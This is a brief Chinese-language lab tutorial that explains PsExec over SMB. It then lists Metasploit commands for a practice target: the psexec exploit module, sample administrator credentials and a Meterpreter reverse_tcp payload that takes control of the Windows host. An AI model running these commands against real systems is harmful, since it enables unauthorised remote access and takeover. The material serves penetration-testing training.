PSExec控制主机通过smb PsExec 是微软 Sysinternals 团队开发的Windows 远程管理工具(windows自带)、,依托SMB协议,输入目标电脑管理员账号密码后,可在本地远程让目标执行命令(如装软件、查日志)。它无需开远程桌面,适合批量运维,操作轻便,但需合法授权,且仅支持管理员权限,非法滥用属违规行为。
- msfconsole(打开作战系统msf平台)
- use exploit/windows/smb/psexec(exploit攻击模块,windows/smbwindows的smb,利用psexec工具打开漏洞)
- set RHOSTS 目标IP 靶机ip)
- set SMBUser用户名 (靶机smb用户名:administrator)
- set SMBPass 密码 (靶机smb密码:administrator@123) 6. set PAYLOAD windows/meterpreter/reverse_tcp(设置windows木马程序(payload)进行漏洞攻击, 实现控制主机)
- exploit (执行)